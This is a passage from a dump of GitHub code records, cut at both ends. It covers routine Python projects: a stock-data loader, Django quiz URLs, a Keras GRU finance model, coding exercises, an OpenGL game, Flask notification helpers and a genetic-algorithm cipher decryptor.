pd.read_csv(r\"../data/AAPL_TIME_SERIES_DAILY.csv\")\nprint(df.head())\n\n\nclass StockDataLocal:\n \"\"\" Class method to get and process local stock data\"\"\"\n\n def __init__(self, data_folder_path = \"../data/\") -> None:\n self._data_folder_path = data_folder_path\n\n def stock_dataframe(self, stockname) -> list:\n \"\"\"\n Returns: list of two dataframes, one for daily time series, one for intraday\n \"\"\"\n stock_df_list = []\n\n for path_ending in [\"_TIME_SERIES_DAILY.csv\", \"_TIME_SERIES_INTRADAY_EXTENDED.csv\"]:\n path = self._data_folder_path + stockname + path_ending\n stock = pd.read_csv(path, index_col=0, parse_dates=True)\n stock.index.rename(\"Date\", inplace=True) \n # inplace=True gör att man inte behöver göra stock.index = stock.index.rename\n\n stock_df_list.append(stock)\n return stock_df_list\n\n \"\"\"\n sdl = StockDataLocal()\n stock_list = sdl.stock_dataframe(\"TSLA\")\n stocklist[0]\n \"\"\"\n","repo_name":"jonssonmarie/Databehandling-MarieJonsson","sub_path":"code_along/L5_dashboard/L5_3_dashboard/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"45148985476","text":"from django.urls import path\n\nfrom student.api.views import CreateUserView, CreateTokenView, ManageUserView, user_properties_view, GetExamView, \\\n GetQuestionView, SaveResponseView, ListExamResponsesView, CreateExamResultsView, ListExamResultsView, \\\n ListQuestionForumView, CreateQuestionForumView, ManageQuestionForumView\n\napp_name = 'student_api'\n\nurlpatterns = [\n path('users/create/', CreateUserView.as_view(), name='create'),\n path('users/token/', CreateTokenView.as_view(), name='token'),\n path('users/me/', ManageUserView.as_view(), name='me'),\n path('users/me/properties/', user_properties_view, name='user_properties'),\n\n path('exams/', GetExamView.as_view()),\n path('exams//', GetQuestionView.as_view()),\n path('exams/response/save/', SaveResponseView.as_view()),\n path('exams/responses//', ListExamResponsesView.as_view()),\n path('exams/result/create/', CreateExamResultsView.as_view()),\n path('exams/results/', ListExamResultsView.as_view()),\n path('forums/question//', ListQuestionForumView.as_view()),\n path('forums/question/create//', CreateQuestionForumView.as_view()),\n path('forums/question/manage//', ManageQuestionForumView.as_view()),\n]\n","repo_name":"Marmik2003/quiz_project","sub_path":"student/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71148511840","text":"import numpy as np\n\n\ndef sph2cart(theta: float, phi: float) -> np.ndarray:\n \"\"\"\n Get the rotation matrix for transforming spherical coordinates\n to cartesian. Note that the matrix is orthogonal so the inverse transform\n is given by its transpose.\n \"\"\"\n sin_th = np.sin(theta)\n cos_th = np.cos(theta)\n sin_ph = np.sin(phi)\n cos_ph = np.cos(phi)\n rot_matrix = np.array(\n [\n [sin_th * cos_ph, cos_th * cos_ph, -sin_ph],\n [sin_th * sin_ph, cos_th * sin_ph, cos_ph],\n [cos_th, -sin_th, 0],\n ]\n )\n return rot_matrix\n\n\ndef cart2sph(theta: float, phi: float) -> np.ndarray:\n \"\"\"\n Get the rotation matrix for transforming cartesian coordinates to\n sphericals given sky angles. This is simply the transpose of the matrix that\n transforms sphericals to cartesian.\n \"\"\"\n rot_matrix = sph2cart(theta, phi).T\n return rot_matrix\n","repo_name":"christianhbye/lusee_sky_simulations","sub_path":"luseesky/utils/coordinates.py","file_name":"coordinates.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"31826031414","text":"# Author: Mark Harmon\n# Purpose: Neural Network on the CME Dataset (Simple Recurrent Model with GRU)\n# Walk Forward Method incoming...\n\nfrom __future__ import print_function\nimport matplotlib\nmatplotlib.use('pdf')\nimport matplotlib.pyplot as plt\nfrom keras.layers import Input, Embedding, GRU, Dense\nfrom keras.models import Model,load_model\nfrom keras.callbacks import EarlyStopping,ModelCheckpoint\nimport pickle as pkl\nimport numpy as np\nfrom os import listdir\nfrom os.path import isfile, join\nfrom sklearn import metrics\nimport time\n\ndef build_rnn():\n main_input = Input(shape=(5,5,), dtype='float32', name='main_input')\n gru1 = GRU(512,return_sequences=True)(main_input)\n gru2 = GRU(512)(gru1)\n # I'm looping right here, but this may be overly complicated\n out = [Dense(5, activation='softmax', name=('main_output' + str(i)))(gru2) for i in range(5)]\n model = Model(main_input, out)\n\n model.compile(optimizer='rmsprop', loss='categorical_crossentropy',metrics=['accuracy'])\n\n return model\n\ndef make_class_weights(classlab):\n\n for i in range(5):\n temp = np.max(np.sum(classlab[0],axis=0))/(np.sum(classlab[0],axis=0)+1)\n if i ==0:\n all = temp\n else:\n all = np.concatenate((all,temp))\n\n # Long and annoying, but easy to read. Find a better way to do this later...\n class_weight = [[{0: all[0],\n 1: all[1],\n 2: all[2],\n 3: all[3],\n 4: all[4]}],[{0: all[5],\n 1: all[6],\n 2: all[7],\n 3: all[8],\n 4: all[9]}],[{0: all[10],\n 1: all[11],\n 2: all[12],\n 3: all[13],\n 4: all[14]}],[{0: all[15],\n 1: all[16],\n 2: all[17],\n 3: all[18],\n 4: all[19]}],[{0: all[20],\n 1: all[21],\n 2: all[22],\n 3: all[23],\n 4: all[24]}]]\n\n return class_weight\n\n# Train model here\ndef main():\n address = '/home/mharmon/FinanceProject/Data/tickdata/train05.pkl'\n\n data,labels = pkl.load(open(address,'rb'))\n\n data = (data - np.mean(data,axis=0))/np.std(data,axis=0)\n model = build_rnn()\n epochs = 100\n month_len = 4*8064\n year_len = 8064*12\n week = int((month_len/4.)/4.)\n numtests = 30\n\n\n num_its = int(4*len(data)/month_len)\n print(num_its)\n modelsavepath = '/home/mharmon/FinanceProject/ModelResults/tick/tickmodel05.hdf5'\n\n beg = 0\n end = month_len\n pngcount=0\n f1store = np.zeros((numtests,5,5))\n\n stock1 = [[], [], [], [], []]\n stock2 = [[], [], [], [], []]\n stock3 = [[], [], [], [], []]\n stock4 = [[], [], [], [], []]\n stock5 = [[], [], [], [], []]\n f1wherestore=[]\n for i in range(numtests):\n\n epochx = data[beg:end]\n epoch_lab = labels[beg:end]\n testx = data[end:end+week]\n test_lab = labels[end:end+week]\n testy = [test_lab[:,i,:] for i in range(len(test_lab[0,:,0]))]\n\n # Do at least 5 validation sets here..\n\n vallen = int(len(epochx) * 0.2)\n trainx = epochx[0:len(epochx) - vallen]\n trainy = [epoch_lab[0:len(epochx) - vallen, i, :] for i in range(len(epoch_lab[0, :, 0]))]\n\n valx = epochx[len(epochx) - vallen:]\n valy = [epoch_lab[len(epochx) - vallen:, i, :] for i in range(len(epoch_lab[0, :, 0]))]\n\n for j in range(2):\n\n\n class_weight = make_class_weights(trainy)\n\n best_loss = 10000\n patience = 0\n while patience<5:\n firsttime=time.time()\n hist = model.fit(trainx, trainy, batch_size=64, verbose=0, epochs=1, validation_data=(valx,valy),\n class_weight=class_weight)\n endtime=time.time()\n current_val = hist.history['val_loss'][0]\n print('')\n print('Window ' + str(i))\n print('Round ' + str(j))\n print('Epoch Took \"%.3f Seconds' %(endtime-firsttime))\n print('Train Loss is ' + str(hist.history['loss'][0]))\n print('Validation Loss is ' + str(hist.history['val_loss'][0]))\n if current_val0:\n stock1[h]+=predictions[h][tempvec1,0].tolist()\n if len(tempvec2)>0:\n stock2[h]+= predictions[h][tempvec2,1].tolist()\n if len(tempvec3)>0:\n stock3[h]+=predictions[h][tempvec3,2].tolist()\n if len(tempvec4)>0:\n stock4[h]+=predictions[h][tempvec4,3].tolist()\n if len(tempvec5)>0:\n stock5[h]+=predictions[h][tempvec5,4].tolist()\n\n\n\n # Print histograms at the end I suppose...\n figmain = '/home/mharmon/FinanceProject/ModelResults/tick/Figures/HistogramAllWeeksStock'\n\n for c in range(5):\n\n figfinal = figmain + '1Class'+str(c)+'.png'\n plt.figure(pngcount)\n plt.hist(stock1[c])\n plt.xlabel('Bins')\n plt.ylabel('Count')\n plt.title('Histogram of ' + str(i+1) + ' Weeks For Stock 1' + ' And Class ' + str(c))\n plt.savefig(figfinal)\n plt.close()\n pngcount+=1\n\n figfinal = figmain + '2Class'+str(c)+'.png'\n plt.figure(pngcount)\n plt.hist(stock2[c])\n plt.xlabel('Bins')\n plt.ylabel('Count')\n plt.title('Histogram of ' + str(i+1) + ' Weeks For Stock 2' + ' And Class ' + str(c))\n plt.savefig(figfinal)\n plt.close()\n pngcount+=1\n\n figfinal = figmain + '3Class'+str(c)+'.png'\n plt.figure(pngcount)\n plt.hist(stock3[c])\n plt.xlabel('Bins')\n plt.ylabel('Count')\n plt.title('Histogram of ' + str(i+1) + ' Weeks For Stock 3' + ' And Class ' + str(c))\n plt.savefig(figfinal)\n plt.close()\n pngcount+=1\n\n figfinal = figmain + '4Class'+str(c)+'.png'\n plt.figure(pngcount)\n plt.hist(stock4[c])\n plt.xlabel('Bins')\n plt.ylabel('Count')\n plt.title('Histogram of ' + str(i+1) + ' Weeks For Stock 4' + ' And Class ' + str(c))\n plt.savefig(figfinal)\n plt.close()\n pngcount+=1\n\n figfinal = figmain + '5Class'+str(c)+'.png'\n plt.figure(pngcount)\n plt.hist(stock5[c])\n plt.xlabel('Bins')\n plt.ylabel('Count')\n plt.title('Histogram of ' + str(i+1) + ' Weeks For Stock 5' + ' And Class ' + str(c))\n plt.savefig(figfinal)\n plt.close()\n pngcount+=1\n\n\n\n return hist\n\nif __name__=='__main__':\n main()","repo_name":"mdharmo/FinanceProject","sub_path":"tickweightnet.py","file_name":"tickweightnet.py","file_ext":"py","file_size_in_byte":9328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5382322664","text":"# 같은 날 동시에 가입한 3명의 사람들이 온라인 채점시스템에 들어와 문제를 푸는 날짜가\n# 매우 규칙적이라고 할 때, 다시 모두 함께 문제를 풀게 되는 그날은 언제일까?\n#\n# 예를 들어 3명이 같은 날 가입/등업하고, 각각 3일마다, 7일마다, 9일마다\n# 한 번씩 들어온다면, 처음 가입하고 63일 만에 다시 3명이 함께 문제를 풀게 된다.\n# 같은 날 동시에 가입한 인원 3명이 규칙적으로 방문하는,\n# 방문 주기가 공백을 두고 입력된다. (단, 입력값은 100이하의 자연수이다.)\n\nx, y, z= input().split(' ')\na = int(x)\nb = int(y)\nc = int(z)\nday = 1\n\nwhile True:\n if day%a!=0 or day%b!=0 or day%c!=0:\n day +=1\n else:\n break\nprint(day)\n\n# if a % b ==0:\n# common1 = a\n# if common1 % c == 0:\n# common2 = common1\n# else:\n# common2 = common1 * c\n# elif b % a == 0:\n# common1 = b\n# if common1 % c == 0:\n# common2 = common1\n# else:\n# common2 = common1 * c\n# else:\n# common1 = a * b\n# if common1 % c == 0:\n# common2 = common1\n# else:\n# common2 = common1 * c\n# print(common2)\n\n","repo_name":"oshsage/Python_Pandas","sub_path":"py4e/CodeUp/1092_comprehensive.py","file_name":"1092_comprehensive.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"15920588769","text":"import sys\r\n\r\ninput = sys.stdin.readline\r\n\r\nn = int(input())\r\nm = int(input())\r\n\r\narr = list(map(int,input().split()))\r\narr.sort()\r\n\r\ncount = 0\r\ni=0\r\nj=(n-1)\r\n\r\nwhile im:\r\n j-=1\r\n else:\r\n count +=1\r\n i +=1\r\n j -=1\r\n\r\n\r\nprint(count)\r\n\r\n","repo_name":"Gye-jin/Study-algorithm","sub_path":"백준/Silver/1940. 주몽/주몽.py","file_name":"주몽.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"35606412151","text":"Range, number = map(int, input().split())\na = list(map(int, input().split()))\na.sort()\nanswer = []\n\ndef p(count):\n if count == number:\n print(\" \".join(map(str, answer)))\n return\n else:\n for i in range(Range):\n if answer:\n answer.append(a[i])\n p(count+1)\n answer.pop()\n else:\n answer.append(a[i])\n p(count+1)\n answer.pop()\np(0)","repo_name":"Deserve82/KK_Algorithm_Study","sub_path":"Kangho/BOJ_15656.py","file_name":"BOJ_15656.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19924298692","text":"# lab02 WWPD?\n\nimport inspect\n\n# preliminaries\n\ndef repeat():\n print(\"try again:\")\n return input()\n\n\ndef intro():\n print(\"What Would Python Display?\")\n print(\n \"type the expected output, 'function' if you think the answer is a function object, 'infinite loop' if it loops forever, 'nothing' if nothing is displayed, or 'error' if it errors; use single quotes '' when needed\\n\"\n )\n\n\ndef outro():\n print(\"\\nall questions for this question set complete\")\n\n\n# reference functions\n\na = lambda x: x\nb = lambda x: lambda: x\nc = b(88)\nd = lambda f: f(4)\n\ndef square(x):\n return x * x\n\nz = 3\ne = lambda x: lambda y: lambda: x + y + z\n\nhigher_order_lambda = lambda f: lambda x: f(x)\ng = lambda x: x * x\ncall_thrice = lambda f: lambda x: f(f(f(x)))\nprint_lambda = lambda z: print(z)\n\n\ndef even(f):\n def odd(x):\n if x < 0:\n return f(-x)\n return f(x)\n return odd\n\nsteven = lambda x: x\n\ndef cake():\n print('beets')\n def pie():\n print('sweets')\n return 'cake'\n return pie\n\ndef snake(x, y):\n if cake == more_cake:\n return chocolate\n else:\n return x + y\n\n# wwpd questions\n\n\ndef wwpd_lambdas(): # wwpd_lambdas\n intro()\n \n print(\">>> lambda x: x\")\n x = input()\n while x != 'function':\n x = repeat()\n\n print(\">>> a = lambda x: x # Assigning the lambda function to the name a\")\n print(\">>> a(5)\")\n x = input()\n while x != str(a(5)):\n x = repeat()\n\n print(\">>> (lambda: 3)() # Using a lambda expression as an operator in a call exp.\")\n x = input()\n while x != \"3\":\n x = repeat()\n\n print(\">>> b = lambda x: lambda: x # Lambdas can return other lambdas!\")\n print(\">>> c = b(88)\")\n print(\">>> c\")\n x = input()\n while x != \"function\":\n x = repeat()\n print(\">>> c()\")\n x = input()\n while x != str(c()):\n x = repeat()\n\n print(\"\\n\", inspect.getsource(square))\n print(\">>> d = lambda f: f(4) # They can have functions as arguments as well.\")\n print(\">>> d(square)\")\n x = input()\n while x != str(d(square)):\n x = repeat()\n\n\n\n print(\">>> x = None\")\n print(\">>> x\")\n print(\">>> lambda x: x\")\n x = input()\n while x != \"function\":\n x = repeat()\n\n\n\n print(\">>> z = 3\")\n print(\">>> e = lambda x: lambda y: lambda: x + y + z\")\n print(\">>> e(0)(1)()\")\n x = input()\n while x != \"4\":\n x = repeat()\n\n print(\">>> f = lambda z: x + z\")\n print(\">>> f(3)\")\n x = input()\n while x != \"error\":\n x = repeat()\n\n\n\n print(\">>> higher_order_lambda = lambda f: lambda x: f(x)\")\n print(\">>> g = lambda x: x * x\")\n print(\">>> higher_order_lambda(2)(g) # Which argument belongs to which function call?\")\n x = input()\n while x != \"error\":\n x = repeat()\n \n print(\">>> higher_order_lambda(g)(2)\")\n x = input()\n while x != str(higher_order_lambda(g)(2)):\n x = repeat()\n\n print(\">>> call_thrice = lambda f: lambda x: f(f(f(x)))\")\n print(\">>> call_thrice(lambda y: y + 1)(0)\")\n x = input()\n while x != str(call_thrice(lambda y: y + 1)(0)):\n x = repeat()\n\n print(\">>> print_lambda = lambda z: print(z) # When is the return expression of a lambda expression executed?\")\n print(\">>> print_lambda\")\n x = input()\n while x != \"function\":\n x = repeat()\n \n print(\">>> one_thousand = print_lambda(1000)\")\n x = input()\n while x != \"1000\":\n x = repeat()\n\n print(\">>> one_thousand\")\n x = input()\n while x != \"nothing\":\n x = repeat()\n\n outro()\n\n\ndef wwpd_hofs(): # wwpd_hofs\n intro()\n print(\"\\n\", inspect.getsource(even))\n\n print(\">>> steven = lambda x: x\")\n print(\">>> stewart = even(steven)\")\n print(\">>> stewart\")\n x = input()\n while x != \"function\":\n x = repeat()\n\n print(\">>> stewart(61)\")\n x = input()\n while x != str(even(steven)(61)):\n x = repeat()\n\n print(\">>> stewart(-4)\")\n x = input()\n while x != str(even(steven)(-4)):\n x = repeat()\n\n \n\n print(\"\\n\", inspect.getsource(cake)) # cake\n\n print(\">>> chocolate = cake()\")\n x = input()\n while x != \"beets\":\n x = repeat()\n\n print(\">>> chocolate\")\n x = input()\n while x != \"function\":\n x = repeat()\n\n print(\">>> chocolate()\")\n x = input()\n while x != \"sweets\":\n x = repeat()\n \n x = input()\n while x != \"'cake'\":\n x = repeat()\n\n print(\">>> more_chocolate, more_cake = chocolate(), cake\")\n x = input()\n while x != 'sweets':\n x = repeat()\n\n print(\">>> more_chocolate\")\n x = input()\n while x != \"'cake'\":\n x = repeat()\n\n print(\"\\n\", inspect.getsource(snake))\n print('>>> snake(10, 20)')\n x = input()\n while x != \"function\":\n x = repeat()\n \n print(\">>> cake = 'cake'\")\n print(\">>> snake(10, 20)\")\n x = input()\n while x != \"30\":\n x = repeat()\n\n outro()","repo_name":"rebeccac05/lab02-rebeccac05","sub_path":"labs/lab02_wwpd.py","file_name":"lab02_wwpd.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14246241269","text":"# coding: utf-8\n\nfrom OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\n\nfrom camera import Camera\nfrom model_loader import *\nfrom vector import Vector3\nfrom input import Input\nfrom player import Player\nfrom gamefield import GameField\n\nimport sys\n\nclass Game:\n\n WINDOW_WIDTH = 1024\n WINDOW_HEIGHT = 768\n\n def __init__(self):\n self.camera = Camera()\n self.input = Input([])\n self.player = Player(self.camera, self.input)\n self.game_field = GameField(self.player)\n self.input.game_field = self.game_field # set game field\n\n def init_gl(self):\n\n glClearColor(0.5, 0.5, 0.5, 1)\n glClearDepth(1) # каждое новое значение z меньше или равно 1\n glEnable(GL_DEPTH_TEST) # включаем буфер глубины (для z координат)\n glEnable(GL_NORMALIZE) # нормали к единичной длине\n glDepthFunc(GL_LEQUAL) # позволяет отрисовывать обьекты привычным образом\n\n glHint(GL_PERSPECTIVE_CORRECTION_HINT, GL_FASTEST) # включаем точное текстурирование\n\n # init light\n glEnable(GL_LIGHTING)\n\n glEnable(GL_LIGHT0)\n glLightfv(GL_LIGHT0, GL_DIFFUSE, [1, 1, 1]) # цвет\n glLightfv(GL_LIGHT0, GL_POSITION, [0, 0, 1, 1]) # 4 аргумент - 0 - рассеянное освещение, 1 - точечное\n glLightf(GL_LIGHT0, GL_SPOT_CUTOFF, 10) # угол между осью и стороной конуса света\n glLightf(GL_LIGHT0, GL_SPOT_EXPONENT, 100) # экспонента убывания интенсивности\n\n # ambient\n glEnable(GL_LIGHT1)\n glLightfv(GL_LIGHT1, GL_DIFFUSE, [0.1, 0.1, 0.1])\n glLightfv(GL_LIGHT1, GL_POSITION, [1, 1, 0, 1])\n\n # init fog\n glFogi(GL_FOG_MODE, GL_EXP2) # алгоритм тумана\n glFogfv(GL_FOG_COLOR, [0.5, 0.5, 0.5, 1])\n glFogf(GL_FOG_DENSITY, 0.15)\n glHint(GL_FOG_HINT, GL_FASTEST) # мы за качеством тумана не гонимся\n glFogf(GL_FOG_START, 1.0) # глубина начала тумана\n glFogf(GL_FOG_END, 5.0) # конец тумана\n glEnable(GL_FOG)\n\n # face culling\n glEnable(GL_CULL_FACE) # включаем возможность пропуска отрисовки невидимых обьектов\n glCullFace(GL_BACK) # убираем отрисовку всего что сзади обьекта\n\n # init camera\n self.camera.set_position(Vector3(0, 1, 1), Vector3(0, 1, 0), Vector3(0, 1, 0))\n\n # init game field\n self.game_field.init()\n\n\n\n # main render function\n def display(self):\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n glMatrixMode(GL_MODELVIEW) # переключение матрицы чтобы координаты модели (позиция, поворот, размер) преобразовывались в мировые координаты\n\n glLoadIdentity() # единичная матрица\n gluLookAt(\n self.camera.m_pos.x, self.camera.m_pos.y, self.camera.m_pos.z,\n self.camera.m_view.x, self.camera.m_view.y, self.camera.m_view.z,\n self.camera.m_up.x, self.camera.m_up.y, self.camera.m_up.z\n ) # устанавливаем значения матрицы исходя значений нашей камеры\n\n glLightfv(GL_LIGHT0, GL_SPOT_DIRECTION,\n [self.camera.m_pos.x, self.camera.m_pos.y - 2, self.camera.m_pos.z - 10]) # point light, ф��нарь\n\n self.player.update()\n self.game_field.render()\n\n glFinish() # усё закончили\n glutSwapBuffers() # можно показать буфер в котором мы чет нарисовали\n glutPostRedisplay() # вызываем функцию которая перерисует экран, иначе анимашки работать не будут\n\n # reshaping window function\n def reshape(self, width, height):\n if height == 0:\n height = 1\n\n ratio = width / height\n glViewport(0, 0, width, height) # указываем рабочую область координат\n glMatrixMode(GL_PROJECTION) # переключение матрицы проекции для настройки вида камеры в мировых координатах (увеличение, соотношение сторон, угол просмотра)\n glLoadIdentity()\n gluPerspective(45.0, ratio, 0.1, 100.0) # делаем так, чтобы видеть как человек\n\n def run(self, argv):\n glutInit(argv)\n glutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE | GLUT_DEPTH)\n glutInitWindowSize(Game.WINDOW_WIDTH, Game.WINDOW_HEIGHT)\n glutInitWindowPosition(450, 50)\n glutCreateWindow('Computer Graphics Game')\n glutDisplayFunc(self.display)\n glutKeyboardFunc(self.input.register_key_down)\n glutKeyboardUpFunc(self.input.register_key_up)\n glutReshapeFunc(self.reshape)\n self.init_gl()\n print(glGetString(GL_VENDOR))\n glutMainLoop()\n\n\nif __name__ == \"__main__\":\n Game().run(sys.argv)","repo_name":"dekamaru/3d-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5389,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32474558127","text":"# app/main/utils.py\nfrom flask_mail import Mail, Message\nfrom twilio.rest import Client\nfrom app import create_app\nimport os\n\nmail = Mail()\n\ndef send_email(subject, recipients, text_body):\n app = create_app()\n with app.app_context():\n msg = Message(subject, recipients=recipients)\n msg.body = text_body\n mail.send(msg)\n\ndef send_sms(to, body):\n client = Client(os.environ.get('TWILIO_ACCOUNT_SID'), os.environ.get('TWILIO_AUTH_TOKEN'))\n message = client.messages.create(\n body=body,\n from_=os.environ.get('TWILIO_PHONE_NUMBER'),\n to=to\n )\n\ndef send_notification(user, message):\n if user.notification_preference == 'email':\n send_email('Notification from SlurmBoard', [user.email], message)\n elif user.notification_preference == 'sms':\n send_sms(user.phone_number, message)\n","repo_name":"NessieCanCode/SlurmBoard","sub_path":"app/main/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"2943046923","text":"# Json is commonly used with API(application program interface), we learn how to parse Json into a python dictionary\n\nimport json\n\n# sample Json\ndetailJSON = '{\"first_name\": \"abdul\", \"last_name\": \"suleiman\", \"age\": 16}'\n\n#parse to dictionary\ndetail = json.loads(detailJSON)\n\nprint(detail)\nprint(detail['first_name'])\n\n# Getting back to json from a dictionary\n\ncarDict = {'make': 'toyota', 'model': 'camry', 'year': 2014}\n\ncarJSON = json.dumps(carDict)\nprint(carJSON)\n\n\n","repo_name":"Abduls69/Tclassified-project-work","sub_path":"json_file.py","file_name":"json_file.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"942975315","text":"\n#practice markov models and genetic algorithm in context of cipher decryption\n#data from: https://lazyprogrammer.me/course_files/moby_dick.txt\n#1. create substition cipher (ground truth)\n#2. create language model on big corpus. unigram + bigram on individual letters, NOT words\n#3. create encoding and decoding functions \n#4. create genetic algorithm to search for best decryption model \n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport string\nimport re\nimport random \n\n#import data, split into paragraphs\ndata = open('moby_dick.txt', encoding=\"utf8\").read()\ndata = data.split(\"\\n\\n\")\n\n#create cipher substitution \nalphabet = list(string.ascii_lowercase)\nshuffled = list(string.ascii_lowercase)\nrandom.shuffle(shuffled)\n\ncipher = {value: shuf for value, shuf in zip(alphabet, shuffled)}\n\n#initial letter probability, and first order markov letter transition probability\npi = {value: 0 for value in list(string.ascii_lowercase)}\nA = {value: {} for value in list(string.ascii_lowercase)}\nfor i in list(string.ascii_lowercase):\n A[i] = {value: 0 for value in list(string.ascii_lowercase)}\n\n#find index where first letter starts in each block of text\nfirstletter = {}\nfor si in range(len(data)):\n s = data[si]\n s = s.lower()\n for i in range(len(s)):\n if s[i] in cipher.keys():\n firstletter[si] = i\n break\n\nfor si in range(len(data)):\n if si in firstletter.keys():\n s = data[si]\n s = s.lower()\n for i in range(firstletter[si], len(s)): \n #first word\n if i == firstletter[si]:\n pi[s[i]] += 1 \n #remaining sentence\n else:\n t_1 = s[i-1]\n t = s[i]\n if t_1 in cipher.keys(): #only work with letters\n if t in cipher.keys(): \n A[t_1][t] += 1\n else:\n continue\n \n#normalize and plus-one smoothing\npi = {value:key+1 for value, key in pi.items()}\ntotalcount = sum(pi.values())\npi = {value:key/totalcount for value, key in pi.items()}\n\nfor i in A.keys():\n A[i] = {value:key+1 for value, key in A[i].items()}\n totalcount = sum(A[i].values())\n A[i] = {value:key/totalcount for value, key in A[i].items()}\n\n#encoding and decoding functions\ndef encoding(s):\n encoded = ''\n s = s.lower()\n for i in range(len(s)):\n if s[i] in cipher.keys():\n encoded += cipher[s[i]]\n else:\n encoded += s[i]\n return encoded\n \ndef decoding(s, dec): \n decoded = ''\n for i in range(len(s)):\n if s[i] in dec.keys():\n decoded += dec[s[i]]\n else:\n decoded += s[i]\n return decoded\n\n#\n# genetic algorithm\n\n#calculate probability of a sequence of letters happening using pi and A\ndef log_likelihood(s, pi, A):\n log = 0\n firstcount = 1\n for i in range(len(s)):\n if s[i] in cipher.keys(): \n #first letter\n if firstcount == 1:\n log += np.log(pi[s[i]])\n firstcount += 1 \n #remaining sentence\n else:\n t_1 = s[i-1]\n t = s[i]\n if t_1 in A.keys():\n if t in A[t_1].keys():\n log += np.log(A[t_1][t])\n return log\n\n#take in a list of sentences, and calculate mean log likelihood value\ndef fitness(s, dec, pi, A):\n encoded = encoding(s)\n decoded = decoding(encoded, dec)\n return log_likelihood(decoded, pi, A)\n \n\n\n\nsentencetotrainon = '''I then lounged down the street and found,\nas I expected, that there was a mews in a lane which runs down\nby one wall of the garden. I lent the ostlers a hand in rubbing\ndown their horses, and received in exchange twopence, a glass of\nhalf-and-half, two fills of shag tobacco, and as much information\nas I could desire about Miss Adler, to say nothing of half a dozen\nother people in the neighbourhood in whom I was not in the least\ninterested, but whose biographies I was compelled to listen to.\n'''\n\n#create 20 different random decoding dicts\nDNA_pool = []\nfor i in range(20):\n a = list(string.ascii_lowercase)\n s = list(string.ascii_lowercase)\n random.shuffle(s)\n DNA_pool.append({value: shuf for value, shuf in zip(a, s)})\n\n#parameters and stuff\nepochs = 1000\nscore = []\npii = list(np.repeat(pi,20))\nAA = list(np.repeat(A,20))\nsentence = [sentencetotrainon]*20\n\n#training\nfor i in range(epochs):\n print('iteration #', i)\n #create 3 offsprings per parent\n if i > 0:\n offsprings= []\n for d in DNA_pool:\n for _ in range(3):\n #for each offstring, shuffle 2 random dict rows\n values = list(d.values())\n idx = np.random.choice(25, size=2, replace = False)\n d1 = list(d.values())[idx[0]]\n d2 = list(d.values())[idx[1]]\n values[idx[0]] = d2\n values[idx[1]] = d1\n offsprings.append({value: shuf for value, shuf in zip(d.keys(), values)})\n DNA_pool = DNA_pool + offsprings\n \n scores = [fitness(s, d, pp, aa) for s, d, pp, aa in zip(sentence, DNA_pool, pii, AA)]\n score.append(np.mean(scores)) #save scores for later\n \n #sort DNA by score and keep top 5\n # DNA_pool = [x for y, x in sorted(zip(scores, DNA_pool))]\n \n sortit = np.argsort(scores)\n DNA_pool =list(np.array(DNA_pool)[sortit])\n DNA_pool = DNA_pool[-5:]\n \n \n#results vary. if log converges to ~ -800, then decoding is pretty good\nplt.plot(score) \n \nprint(sentencetotrainon)\nencoded = encoding(sentencetotrainon)\nprint('')\nprint(decoding(encoded, DNA_pool[4]))\n","repo_name":"johnson-ying/machine-learning-practice","sub_path":"nlp_pt_1/cipher_decryption.py","file_name":"cipher_decryption.py","file_ext":"py","file_size_in_byte":5682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"20252562039","text":"from dataclasses import asdict\n\nfrom lightning import Fabric\n\n\ndef test_config_identical():\n import lit_parrot.adapter as parrot_adapter\n import lit_parrot.model as parrot\n\n name = \"pythia-70m\"\n base_config = asdict(parrot.Config.from_name(name))\n adapter_config = asdict(parrot_adapter.Config.from_name(name))\n del adapter_config[\"adapter_prompt_length\"]\n del adapter_config[\"adapter_start_layer\"]\n assert adapter_config == base_config\n\n with Fabric(accelerator=\"cpu\").init_module(empty_init=True):\n base_model = parrot.Parrot.from_name(name)\n adapter_model = parrot_adapter.Parrot.from_name(name)\n assert adapter_model.lm_head.weight.shape == base_model.lm_head.weight.shape\n","repo_name":"phedone/lit-parrot","sub_path":"tests/test_adapter.py","file_name":"test_adapter.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"73050235997","text":"import os\n\nfrom tqdm import tqdm\n\n\nOUT_DIR = '~/data_tmp/abstract/acs/pdf/'\nURL_FN = '~/data_tmp/abstract/acs/urls.txt'\nos.makedirs(OUT_DIR, exist_ok=True)\n\n\nwith open(URL_FN, 'r') as fd:\n 